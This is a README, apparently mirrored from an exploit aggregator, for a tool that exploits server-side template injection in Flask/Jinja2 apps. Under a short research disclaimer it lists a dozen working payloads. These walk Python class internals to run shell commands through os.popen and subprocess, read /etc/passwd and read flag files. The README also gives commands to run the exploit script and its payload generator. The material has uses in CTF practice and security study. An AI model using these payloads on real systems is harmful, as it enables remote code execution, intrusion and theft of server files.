Share
## https://sploitus.com/exploit?id=D8498B66-80E3-5FEC-B80C-CB70CC7B2635
## Tools for Exploiting SSTI Vulnerabilities under Flask

### Disclaimer

This tool is intended solely for personal security research and learning purposes. Any direct or indirect consequences or losses resulting from the dissemination or use of this tool are solely responsible for the user. The tool author assumes no responsibility for such incidents.

### Environment

![image-20260308202646235](README.assets/image-20260308202646235.png)

### Payloads

Some of the payloads used in the script:

6 original payloads

```
1._frozen_importlib.BuiltinImporter:
{{().__class__.__base__.__subclasses__()[104]['load_module']('os')['popen']('whoami').read()}}

2.
{{''.__class__.__base__.__subclasses__()[119]["get_data"](0,"/etc/passwd")}}

3.subprocess.Popen
{{[].__class__.__base__.__subclasses__()[461]('whoami',shell=True,stdout=-1).communicate()[0].strip()}}

4.'eval':
RCE:{{().__class__.__base__.__subclasses__()[119].__init__.__globals__['__builtins__']['eval']('__import__("os").popen("whoami").read()')}}
File reading:{{''.__class__.__base__.__subclasses__()[119].__init__.__globals__['__builtins__'].open("flag.txt").read()}}

5.linecache
{{().__class__.__base__.__subclasses__()[202].__init__.__globals__.linecache.os.popen("whoami").read()}}

6.popen
{{().__class__.__base__.__subclasses__()[139].__init__.__globals__['popen']('whoami').read()}}
```

Unnumbered payloads

```
{{config.__class__.__init__.__globals__['__builtins__'].open('flag.txt').read()}} File reading
{{config.__class__.__init__.__globals__['os'].popen("whoami").read()}} Command execution
{{ self.__init__.__globals__.__builtins__.open('flag.txt').read() }}

{{url_for.__globals__.os.popen('whoami').read()}}
{{get_flashed_messages.__globals__.os.popen('whoami').read()}}
{{lipsum.__globals__.os.popen('whoami').read()}}
```

### Results

Run the target environment first:

![image-20260308202926712](README.assets/image-20260308202926712.png)

Run the script:

```
python flask_ssti_exploit.py
```

![image-20260308203432246](README.assets/image-20260308203432246.png)

![image-20260308203454841](README.assets/image-20260308203454841.png)

Generate ~~all~~ available payloads

```
python flask_ssti_exploit.py --generate
```

![image-20260308203804963](README.assets/image-20260308203804963.png)

This tool wouldn’t be possible without the various useful tools and excellent articles written by our mentors. Thank you!